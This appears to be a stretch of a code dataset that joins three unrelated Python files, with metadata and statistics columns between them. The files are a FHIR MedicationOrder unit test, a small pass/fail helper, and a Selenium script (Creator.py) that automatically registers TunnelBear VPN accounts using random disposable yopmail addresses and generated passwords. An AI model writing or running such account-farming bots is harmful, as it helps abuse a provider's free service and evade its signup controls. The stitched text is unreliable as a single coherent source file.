        return medicationorder.MedicationOrder(js)

    def testMedicationOrder1(self):
        inst = self.instantiate_from("medicationorder-example-f005-enalapril.json")
        self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
        self.implMedicationOrder1(inst)
        js = inst.as_json()
        self.assertEqual("MedicationOrder", js["resourceType"])
        inst2 = medicationorder.MedicationOrder(js)
        self.implMedicationOrder1(inst2)

    def implMedicationOrder1(self, inst):
        self.assertEqual(inst.dateWritten.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dateWritten.as_json(), "2011-05-01")
        self.assertEqual(inst.dispenseRequest.quantity.code, "46992007")
        self.assertEqual(inst.dispenseRequest.quantity.system, "http://snomed.info/sct")
        self.assertEqual(inst.dispenseRequest.quantity.value, 28)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.as_json(), "2011-05-01")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "mg")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "mg")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 5)
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "386359008")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].display, "Administration of drug or medicament via oral route")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].display, "Entire oral cavity")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(), "2011-05-01")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
        self.assertEqual(inst.id, "f005")
        self.assertEqual(inst.identifier[0].system, "http://www.bmc.nl/portal/prescriptions")
        self.assertEqual(inst.identifier[0].use, "official")
        self.assertEqual(inst.identifier[0].value, "order9823343")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "38341003")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].display, "High blood pressure")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.status, "active")
        self.assertEqual(inst.text.status, "generated")

    def testMedicationOrder2(self):
        inst = self.instantiate_from("medicationorder-example-f004-metoprolol.json")
        self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
        self.implMedicationOrder2(inst)
        js = inst.as_json()
        self.assertEqual("MedicationOrder", js["resourceType"])
        inst2 = medicationorder.MedicationOrder(js)
        self.implMedicationOrder2(inst2)

    def implMedicationOrder2(self, inst):
        self.assertEqual(inst.dateWritten.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dateWritten.as_json(), "2011-05-01")
        self.assertEqual(inst.dispenseRequest.quantity.code, "46992007")
        self.assertEqual(inst.dispenseRequest.quantity.system, "http://snomed.info/sct")
        self.assertEqual(inst.dispenseRequest.quantity.value, 90)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.as_json(), "2011-05-01")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "mg")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "mg")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 50)
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "386359008")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].display, "Administration of drug or medicament via oral route")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].display, "Entire oral cavity")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(), "2011-05-01")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
        self.assertEqual(inst.id, "f004")
        self.assertEqual(inst.identifier[0].system, "http://www.bmc.nl/portal/prescriptions")
        self.assertEqual(inst.identifier[0].use, "official")
        self.assertEqual(inst.identifier[0].value, "order9845343")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "38341003")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].display, "High blood pressure")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.status, "active")
        self.assertEqual(inst.text.status, "generated")

    def testMedicationOrder3(self):
        inst = self.instantiate_from("medicationorder-example-f001-combivent.json")
        self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
        self.implMedicationOrder3(inst)
        js = inst.as_json()
        self.assertEqual("MedicationOrder", js["resourceType"])
        inst2 = medicationorder.MedicationOrder(js)
        self.implMedicationOrder3(inst2)

    def implMedicationOrder3(self, inst):
        self.assertEqual(inst.dateWritten.date, FHIRDate("2013-05-25T19:32:52+01:00").date)
        self.assertEqual(inst.dateWritten.as_json(), "2013-05-25T19:32:52+01:00")
        self.assertEqual(inst.dispenseRequest.expectedSupplyDuration.code, "d")
        self.assertEqual(inst.dispenseRequest.expectedSupplyDuration.system, "urn:oid:2.16.840.1.113883.6.8")
        self.assertEqual(inst.dispenseRequest.expectedSupplyDuration.unit, "days")
        self.assertEqual(inst.dispenseRequest.expectedSupplyDuration.value, 40)
        self.assertEqual(inst.dispenseRequest.numberOfRepeatsAllowed, 20)
        self.assertEqual(inst.dispenseRequest.quantity.code, "ug")
        self.assertEqual(inst.dispenseRequest.quantity.system, "urn:oid:2.16.840.1.113883.6.8")
        self.assertEqual(inst.dispenseRequest.quantity.unit, "mcg")
        self.assertEqual(inst.dispenseRequest.quantity.value, 100)
        self.assertEqual(inst.dispenseRequest.validityPeriod.end.date, FHIRDate("2013-05-30").date)
        self.assertEqual(inst.dispenseRequest.validityPeriod.end.as_json(), "2013-05-30")
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2013-04-08").date)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.as_json(), "2013-04-08")
        self.assertEqual(inst.dosageInstruction[0].additionalInstructions.text, "for use during pregnancy, contact physician")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "ml")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "ml")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 10)
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "394899003")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].display, "oral administration of treatment")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].display, "Entire oral cavity")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].text, "3 tot 4 maal daags 1 flacon")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.date, FHIRDate("2013-11-05").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.as_json(), "2013-11-05")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date, FHIRDate("2013-08-04").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(), "2013-08-04")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 3)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
        self.assertEqual(inst.id, "f001")
        self.assertEqual(inst.identifier[0].system, "http://www.bmc/portal/prescriptions")
        self.assertEqual(inst.identifier[0].use, "official")
        self.assertEqual(inst.identifier[0].value, "order9837293")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "13645005")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].display, "Chronic obstructive pulmonary disease")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.status, "active")
        self.assertEqual(inst.text.status, "generated")

    def testMedicationOrder4(self):
        inst = self.instantiate_from("medicationorder-example-f201-salmeterol.json")
        self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
        self.implMedicationOrder4(inst)
        js = inst.as_json()
        self.assertEqual("MedicationOrder", js["resourceType"])
        inst2 = medicationorder.MedicationOrder(js)
        self.implMedicationOrder4(inst2)

    def implMedicationOrder4(self, inst):
        self.assertEqual(inst.dateWritten.date, FHIRDate("2013-03-11").date)
        self.assertEqual(inst.dateWritten.as_json(), "2013-03-11")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "PUFF")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.system, "http://hl7.org/fhir/v3/orderableDrugForm")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 1)
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.code, "259032004")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.unit, "daily")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.value, 1)
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.code, "415215001")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.unit, "puffs")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.value, 2)
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].code, "320276009")
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].display, "Salmeterol+fluticasone 25/250ug inhaler")
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "321667001")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].display, "Respiratory tract")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "74262004")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].display, "Oral cavity")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].text, "aerosol 25/250ug/do 120do 2x - 1 dose - daily")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.date, FHIRDate("2013-05-11").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.as_json(), "2013-05-11")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date, FHIRDate("2013-03-11").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(), "2013-03-11")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 2)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
        self.assertEqual(inst.id, "f201")
        self.assertEqual(inst.status, "active")
        self.assertEqual(inst.text.status, "generated")

    def testMedicationOrder5(self):
        inst = self.instantiate_from("medicationorder-example-f203-paracetamol.json")
        self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
        self.implMedicationOrder5(inst)
        js = inst.as_json()
        self.assertEqual("MedicationOrder", js["resourceType"])
        inst2 = medicationorder.MedicationOrder(js)
        self.implMedicationOrder5(inst2)

    def implMedicationOrder5(self, inst):
        self.assertEqual(inst.dateWritten.date, FHIRDate("2013-04-04").date)
        self.assertEqual(inst.dateWritten.as_json(), "2013-04-04")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.code, "258702006")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.unit, "hours")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.value, 24)
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.code, "258684004")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.unit, "milligram")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.value, 3000)
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].code, "322236009")
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].display, "Paracetamol 500mg tablet")
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].text, "Paracetamol 3xdaags 1000mg")
        self.assertEqual(inst.id, "f203")
        self.assertEqual(inst.status, "active")
        self.assertEqual(inst.text.status, "generated")

    def testMedicationOrder6(self):
        inst = self.instantiate_from("medicationorder-example-f202-flucloxacilline.json")
        self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
        self.implMedicationOrder6(inst)
        js = inst.as_json()
        self.assertEqual("MedicationOrder", js["resourceType"])
        inst2 = medicationorder.MedicationOrder(js)
        self.implMedicationOrder6(inst2)

    def implMedicationOrder6(self, inst):
        self.assertEqual(inst.dateWritten.date, FHIRDate("2013-03-11").date)
        self.assertEqual(inst.dateWritten.as_json(), "2013-03-11")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.code, "258702006")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.unit, "hours")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.denominator.value, 24)
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.code, "258682000")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.unit, "gram")
        self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.value, 12)
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].code, "323493005")
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].display, "Injected floxacillin")
        self.assertEqual(inst.dosageInstruction[0].method.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "47625008")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].display, "Intravenous route")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].text, "Flucloxacilline 12g/24h")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.date, FHIRDate("2013-03-21").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.as_json(), "2013-03-21")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date, FHIRDate("2013-03-11").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(), "2013-03-11")
        self.assertEqual(inst.id, "f202")
        self.assertEqual(inst.status, "completed")
        self.assertEqual(inst.text.status, "generated")

    def testMedicationOrder7(self):
        inst = self.instantiate_from("medicationorder-example-f002-crestor.json")
        self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
        self.implMedicationOrder7(inst)
        js = inst.as_json()
        self.assertEqual("MedicationOrder", js["resourceType"])
        inst2 = medicationorder.MedicationOrder(js)
        self.implMedicationOrder7(inst2)

    def implMedicationOrder7(self, inst):
        self.assertEqual(inst.dateWritten.date, FHIRDate("2013-04-08").date)
        self.assertEqual(inst.dateWritten.as_json(), "2013-04-08")
        self.assertEqual(inst.dispenseRequest.quantity.code, "46992007")
        self.assertEqual(inst.dispenseRequest.quantity.system, "http://snomed.info/sct")
        self.assertEqual(inst.dispenseRequest.quantity.value, 90)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2013-04-08").date)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.as_json(), "2013-04-08")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "mg")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "mg")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 10)
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "386359008")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].display, "Administration of drug or medicament via oral route")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].display, "Entire oral cavity")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date, FHIRDate("2013-08-04").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(), "2013-08-04")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
        self.assertEqual(inst.id, "f002")
        self.assertEqual(inst.identifier[0].system, "http://www.bmc.nl/portal/prescriptions")
        self.assertEqual(inst.identifier[0].use, "official")
        self.assertEqual(inst.identifier[0].value, "order9837343")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "28036006")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].display, "High density lipoprotein cholesterol level")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.status, "active")
        self.assertEqual(inst.text.status, "generated")

    def testMedicationOrder8(self):
        inst = self.instantiate_from("medicationorder-example-f003-tolbutamide.json")
        self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
        self.implMedicationOrder8(inst)
        js = inst.as_json()
        self.assertEqual("MedicationOrder", js["resourceType"])
        inst2 = medicationorder.MedicationOrder(js)
        self.implMedicationOrder8(inst2)

    def implMedicationOrder8(self, inst):
        self.assertEqual(inst.dateWritten.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dateWritten.as_json(), "2011-05-01")
        self.assertEqual(inst.dispenseRequest.quantity.code, "46992007")
        self.assertEqual(inst.dispenseRequest.quantity.system, "http://snomed.info/sct")
        self.assertEqual(inst.dispenseRequest.quantity.value, 90)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dispenseRequest.validityPeriod.start.as_json(), "2011-05-01")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "mg")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "mg")
        self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 500)
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "386359008")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].display, "Administration of drug or medicament via oral route")
        self.assertEqual(inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].display, "Entire oral cavity")
        self.assertEqual(inst.dosageInstruction[0].siteCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date, FHIRDate("2011-05-01").date)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(), "2011-05-01")
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 3)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
        self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
        self.assertEqual(inst.id, "f003")
        self.assertEqual(inst.identifier[0].system, "http://www.bmc.nl/portal/prescriptions")
        self.assertEqual(inst.identifier[0].use, "official")
        self.assertEqual(inst.identifier[0].value, "order9845343")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "444780001")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].display, "High glucose level in blood")
        self.assertEqual(inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.status, "active")
        self.assertEqual(inst.text.status, "generated")
| 44.396923 | 88 | 0.647411 | 2,835 | 28,858 | 6.574956 | 0.093122 | 0.20118 | 0.245655 | 0.266524 | 0.892328 | 0.877414 | 0.863734 | 0.823981 | 0.788841 | 0.7478 | 0 | 0.051757 | 0.228048 | 28,858 | 649 | 89 | 44.465331 | 0.78498 | 0.003916 | 0 | 0.578862 | 1 | 0 | 0.138379 | 0.017571 | 0 | 0 | 0 | 0 | 0.419512 | 1 | 0.027642 | false | 0 | 0.009756 | 0 | 0.04065 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
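Every testMedicationOrderN/implMedicationOrderN pair above exercises the same round trip: parse the example JSON, assert, serialize with as_json(), re-parse, and assert again. A sketch of factoring that pattern into one helper; the method name is an assumption, the calls are the ones the tests already use:

def roundtrip(self, filename, impl):
    # Parse the example, check it, then re-serialize and re-check so the
    # assertions cover both the parser and as_json().
    inst = self.instantiate_from(filename)
    self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
    impl(inst)
    js = inst.as_json()
    self.assertEqual("MedicationOrder", js["resourceType"])
    impl(medicationorder.MedicationOrder(js))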
fb620277e49e163e9b63b5f5428cc7bd230a8494 | 163 | py | Python | test/system/lib/test_result.py | mjlee34/poseidonos | 8eff75c5ba7af8090d3ff4ac51d7507b37571f9b | [
"BSD-3-Clause"
] | null | null | null | test/system/lib/test_result.py | mjlee34/poseidonos | 8eff75c5ba7af8090d3ff4ac51d7507b37571f9b | [
"BSD-3-Clause"
] | null | null | null | test/system/lib/test_result.py | mjlee34/poseidonos | 8eff75c5ba7af8090d3ff4ac51d7507b37571f9b | [
"BSD-3-Clause"
] | null | null | null | def expect_true(code):
    if code == 0:
        return "pass"
    return "fail"

def expect_false(code):
    if code != 0:
        return "pass"
    return "fail"
| 18.111111 | 23 | 0.558282 | 22 | 163 | 4.045455 | 0.454545 | 0.202247 | 0.224719 | 0.247191 | 0.696629 | 0.696629 | 0.696629 | 0.696629 | 0 | 0 | 0 | 0.018018 | 0.319018 | 163 | 9 | 24 | 18.111111 | 0.783784 | 0 | 0 | 0.5 | 0 | 0 | 0.097561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 8
fba62d2d56869ee698d26e1a057350217ada4bed | 4,427 | py | Python | Creator.py | Greycefulz/Selenium-Tunnel-Bear-Account-Creator | b1a330209bdfa7c4052a9aeda65f3deb71bdaf19 | [
"MIT"
] | 1 | 2021-09-26T00:52:43.000Z | 2021-09-26T00:52:43.000Z | Creator.py | Greycefulz/Selenium-Tunnel-Bear-Account-Creator | b1a330209bdfa7c4052a9aeda65f3deb71bdaf19 | [
"MIT"
] | null | null | null | Creator.py | Greycefulz/Selenium-Tunnel-Bear-Account-Creator | b1a330209bdfa7c4052a9aeda65f3deb71bdaf19 | [
"MIT"
] | null | null | null | from colorama import *
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from time import sleep
import os
import random
options = webdriver.ChromeOptions()
driver = webdriver.Chrome(options=options, executable_path=r"chromedriver.exe")
actions = ActionChains(driver)  # reserved for chained interactions; unused duplicate chains removed
tunnel = "https://www.tunnelbear.com/account/login"
yopmail = "https://yopmail.com/en"
driver.get(tunnel)
driver.find_element_by_xpath("/html/body/div/div[1]/div[2]/div/section/div/div/div/div/div/div[3]/p/button").click()
# Build a random 9-character mailbox name and 13-character password from the
# same character pools as before (one random.choice call per character).
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789"
email = "".join(random.choice(chars) for _ in range(9)) + "@cool.fr.nf"
password = "".join(random.choice(chars + "!@#$%^&*()_+") for _ in range(13))
driver.find_element_by_xpath("/html/body/div/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/div[1]/div[2]/input").click()
driver.find_element_by_xpath("/html/body/div/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/div[1]/div[2]/input").send_keys(email)
driver.find_element_by_xpath("/html/body/div[1]/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/div[2]/div[2]/input").click()
driver.find_element_by_xpath('/html/body/div[1]/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/div[2]/div[2]/input').send_keys(password)
driver.find_element_by_xpath("/html/body/div[1]/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/button/span").click()
created = f"""
╔═╗╔═╗╔═╗╔═╗╦ ╦╔╗╔╔╦╗ ╔═╗╦═╗╔═╗╔═╗╔╦╗╔═╗╔╦╗
╠═╣║ ║ ║ ║║ ║║║║ ║ ║ ╠╦╝║╣ ╠═╣ ║ ║╣ ║║
╩ ╩╚═╝╚═╝╚═╝╚═╝╝╚╝ ╩ ╚═╝╩╚═╚═╝╩ ╩ ╩ ╚═╝═╩╝\n
"""
email1 = email.split('@')[0]  # mailbox name for yopmail; the original split(':') never split anything
driver.get(yopmail)
driver.find_element_by_xpath("/html/body/div/div[2]/main/div[3]/div/div[1]/div[2]/div/div/form/div/div[1]/div[2]/div/input").click()
driver.find_element_by_xpath("/html/body/div/div[2]/main/div[3]/div/div[1]/div[2]/div/div/form/div/div[1]/div[2]/div/input").send_keys(email1)
driver.find_element_by_xpath("/html/body/div/div[2]/main/div[3]/div/div[1]/div[2]/div/div/form/div/div[1]/div[4]/button/i").click()
os.system("cls")
print(created)
print(f"{email}:{password}\n")
print("Refresh Until You See The Verification Email :)\n\n\n\n\n")
# https://github.com/Greycefulz
| 72.57377 | 1,193 | 0.770499 | 500 | 4,427 | 6.938 | 0.212 | 0.077832 | 0.062266 | 0.449697 | 0.717786 | 0.683771 | 0.683771 | 0.683771 | 0.683771 | 0.683771 | 0 | 0.053824 | 0.043144 | 4,427 | 60 | 1,194 | 73.783333 | 0.740557 | 0.006551 | 0 | 0 | 0 | 0.209302 | 0.595086 | 0.5298 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.069767 | 0.302326 | 0 | 0.302326 | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
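The script above imports WebDriverWait and expected_conditions but never uses them, so every find_element call races against page load. A sketch of the explicit-wait pattern those imports suggest; the 15-second timeout is an assumption and the XPath is one the script already uses:

wait = WebDriverWait(driver, 15)
signup_button = wait.until(EC.element_to_be_clickable(
    (By.XPATH, "/html/body/div/div[1]/div[2]/div/section/div/div/div/div/div/div[3]/p/button")))
signup_button.click()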
